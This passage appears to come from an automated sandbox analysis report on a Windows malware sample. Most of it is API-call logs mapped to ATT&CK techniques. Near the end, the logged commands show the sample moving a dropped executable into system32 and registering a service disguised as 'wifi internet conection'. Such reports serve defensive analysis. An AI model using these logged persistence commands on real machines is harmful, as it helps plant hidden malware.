00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00002240)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00002780)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00002780)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00002700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00002700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00002700)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e646a@ADVAPI32.dll\"\n \"0e000f00703f646a@ADVAPI32.dll\"\n \"0e000f00cc3f646a@ADVAPI32.dll\"\n \"11001200b447646a@ADVAPI32.dll\"\n \"110012004848646a@ADVAPI32.dll\"\n \"120013008c48646a@ADVAPI32.dll\"\n \"12001300e448646a@ADVAPI32.dll\"\n \"14001500dc6f646a@ADVAPI32.dll\"\n \"14001500f46f646a@ADVAPI32.dll\"\n \"140015000c70646a@ADVAPI32.dll\"\n \"170018002470646a@ADVAPI32.dll\"\n \"0d000e003c70646a@ADVAPI32.dll\"\n \"110012004c70646a@ADVAPI32.dll\"\n \"110012006070646a@ADVAPI32.dll\"\n \"0d000e003449646a@SHELL32.dll\"\n \"0d000e00b049646a@SHELL32.dll\"\n \"0f001000a071646a@ADVAPI32.dll\"\n \"14001500e071646a@ADVAPI32.dll\"\n \"14001500f871646a@ADVAPI32.dll\"\n \"0c000d004072646a@ADVAPI32.dll\"\n \"0c000d005072646a@ADVAPI32.dll\"\n \"0e000f006072646a@ADVAPI32.dll\"\n \"0e000f007072646a@ADVAPI32.dll\"\n \"0b000c008072646a@ADVAPI32.dll\"\n \"14001500b473646a@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005864)\n \"cmd.exe\" called \"CreateDirectoryW\" with parameter %WINDIR%\\system32\\dzhrysuy\\ (UID: 00000000-00006104)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\dzhrysuy\\\" - (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\hfopyujf.exe\" %WINDIR%\\system32\\dzhrysuy\\\" - (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create dzhrysuy binPath= \"%WINDIR%\\system32\\dzhrysuy\\hfopyujf.exe /d\\\"C:\\120894e1a20de2fefb24647fa4\" - (UID: 00000000-00005864)\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description dzhrysuy \"wifi internet conection\"\" - (UID: 